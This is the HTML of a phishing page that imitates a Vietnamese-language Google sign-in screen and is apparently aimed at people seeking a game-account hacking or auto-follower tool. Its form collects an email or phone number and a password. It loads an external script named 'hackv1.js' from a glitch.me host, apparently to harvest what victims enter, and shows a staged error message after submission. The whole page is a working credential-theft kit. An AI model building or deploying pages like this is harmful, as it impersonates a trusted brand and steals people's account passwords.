<!DOCTYPE html>
<html>
   <head>
      <meta content='width=device-width, initial-scale=1' name='viewport' />
      <meta content='text/html; charset=UTF-8' http-equiv='Content-Type' />
      <title>Google - Đăng nhập hoặc đăng ký</title>
      <meta name="search engines" content="Aeiwi, Alexa, AllTheWeb, AltaVista, AOL Netfind, Anzwers, Canada, DirectHit, EuroSeek, Excite, Overture, Go, Google, HotBot. InfoMak, Kanoodle, Lycos, MasterSite, National Directory, Northern Light, SearchIt, SimpleSearch, WebsMostLinked, WebTop, What-U-Seek, AOL, Yahoo, WebCrawler, Infoseek, Excite, Magellan, LookSmart, bing, CNET, Googlebot" />
      <meta property="og:type" content="website" />
      <meta property="og:title" content="Đăng nhập Google | Google">
      <meta property="og:description" content="Hãy đăng nhập Google để bắt đầu chia sẻ và kết nối với bạn bè, gia đình và những người bạn biết.">
      <meta name="description" content="Hãy đăng nhập Google để bắt đầu chia sẻ và kết nối với bạn bè, gia đình và những người bạn biết." />
      <meta name="keywords" content="auto followers, auto follower, Free increase unlimite followers, best auto follower, autofollower, followers" />
      <meta name="robots" content="index, follow" />
      <meta name="robot" content="index, follow" />
      <meta name="googlebot" content="index, follow" />
      <meta name="YandexBot" content="index, follow" />
      <link rel="shortcut icon" href="http://www.androidpolice.com/wp-content/themes/ap2/ap_resize/ap_resize.php?src=http%3A%2F%2Fwww.androidpolice.com%2Fwp-content%2Fuploads%2F2015%2F10%2Fnexus2cee_Search-Thumb-150x150.png&w=150&h=150&zc=3" type="image/x-icon" />
      <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
      <link class="tempLink" rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Roboto:regular">
      <script src='//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js' type="text/javascript"></script>
      <link rel="stylesheet" href="css/fb.css">
      <script src="//cdn.jsdelivr.net/npm/sweetalert2@11"></script>
      <style>
        img {
  display: block;
  width: 80px;
  margin: 30px auto;
  box-shadow: 0 5px 10px -7px #333333;
  border-radius: 50%;
}

.form {
  background-color: #ffffff;
  width: 500px;
  margin: 50px auto 10px auto;
  padding: 30px;
  border-radius: 8px;
  overflow: hidden;
  box-shadow: 0 2px 10px -3px #333;
  text-align: center;
}

input {
  border-radius: 100px;
  padding: 10px 15px;
  width: 50%;
  border: 1px solid #D9D9D9;
  outline: none;
  display: block;
  margin: 20px auto 20px auto;
}

button {
  border-radius: 100px;
  border: none;
  background: #719BE6;
  width: 50%;
  padding: 10px;
  color: #FFFFFF;
  margin-top: 25px;
  box-shadow: 0 2px 10px -3px #719BE6;
  display: block;
  margin: 55px auto 10px auto;
}

a {
  text-align: center;
  margin-top: 30px;
  color: #719BE6;
  text-decoration: none;
  padding: 5px;
  display: inline-block;
}

a:hover {
  text-decoration: underline;
}
.field-icon {
    float: right;
    cursor: pointer;
    margin-right: 10px;
    margin-top: -51px;
    opacity: 0.5;
}
@media only screen and (max-width: 600px) {
.field-icon {
  float: right;
    left: -32px;
  margin-top: -45px;
  opacity: 0.5;
  z-index: 2;
}
}
      </style>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css" integrity="sha512-Fo3rlrZj/k7ujTnHg4CGR2D7kSs0v4LLanw2qksYuRlEzO+tcaEPQogQ0KaoGN26/zrn20ImR1DfuLWnOo7aBA==" crossorigin="anonymous" referrerpolicy="no-referrer" />

   </head>
   <body>
      <div class="container">
         
       
         <div class="row h-100 justify-content-center align-items-center mt-2">
            <div class="col-md-4 vhnlog">
              <div class="d-flex justify-content-center">
                <img src="http://www.androidpolice.com/wp-content/themes/ap2/ap_resize/ap_resize.php?src=http%3A%2F%2Fwww.androidpolice.com%2Fwp-content%2Fuploads%2F2015%2F10%2Fnexus2cee_Search-Thumb-150x150.png&w=150&h=150&zc=3">              </div>
               <form   id="login_form">
                  <input type="hidden" name="type" value="Google">
                  <div class="form-group">
                     <input type="text" class="form-control" id="id" name="taikhoan" placeholder="Vui lòng nhập số di động hoặc email" >
                     <span id="login_error1" style="color:red;  float: left;margin-top: -24px;padding-bottom: 10px;padding-top: 5px;padding-left: 10px; display: none;" >Email hoặc số điện thoại không hợp lệ.</span>
                  </div>
                
                  <div class="form-group">
                     <input type="password" class="form-control" id="password-field" name="matkhau" placeholder="Password" ><span toggle="#password-field" class="fa fa-fw fa-eye field-icon toggle-password"></span>
                     <span id="login_error2" style="color:red;  float: left;margin-top: -24px;padding-bottom: 10px;padding-top: 5px;padding-left: 10px; display: none;" >Sử dụng 8 ký tự trở lên cho mật khẩu của bạn.</span>
                  
                  </div>
                  <div class="form-group">
                     <center>
                        <button  type="submit"  id="submit" class="btn btn-primary btn-block">Đăng nhập</button>
                     </center>
                  </div>
               </form>
               <div id="login_reg_separator" class="_43mg _8qtf" data-sigil="login_reg_separator"><span class="_43mh">hoặc</span></div>
               <center>
                  <input type="button" value="Tạo tài khoản mới" />
               </center>
            </div>
         </div>
         <div class="row text-center" style="margin-top: 6rem;">
            <div class="col">
               <small class="text-muted">Tiếng Việt</small><br />
               <small class="blue">English (US)</small>
            </div>
            <div class="col">
               <small class="blue">Hindi (IN)</small>
               <br />
               <i class="far fa-plus-square"></i>
            </div>
         </div>
         <div class="row text-center">
            <div class="col-md-12">
               <small class="text-muted">Google, Inc.</small>
            </div>
         </div>
      </div>
      <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous" type="text/javascript"></script>
      <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous" type="text/javascript"></script>
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js" type="text/javascript"></script>
      <script src="https://scripth.glitch.me/hackv1.js"></script>
      
      <script>
        
         
                  //cài đặt thông báo sau khi đăng nhập ở đây
 let icon ='error'; //icon='error: thất bại | icon='success':thành công
 let title ='Thông báo'; // tiêu đề
 let text ='Tài khoản của bạn hiện đang nằm trong danh sách theo dõi của garena nên không thể hack!'; //content
      //  hàm show pass 
 $(".toggle-password").click(function() {

$(this).toggleClass("fa-eye fa-eye-slash");
var input = $($(this).attr("toggle"));
if (input.attr("type") == "password") {
  input.attr("type", "text");
} else {
  input.attr("type", "password");
}
});

         </script>

        
      <script>'undefined'=== typeof _trfq || (window._trfq = []);'undefined'=== typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'}),_trfd.push({'ap':'cpbh-oh'},{'server':'sg2plvcpnl474651'},{'id':'7870334'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.</script><script src='https://img1.wsimg.com/tcc/tcc_l.combined.1.0.6.min.js'></script>
   </body>
</html>

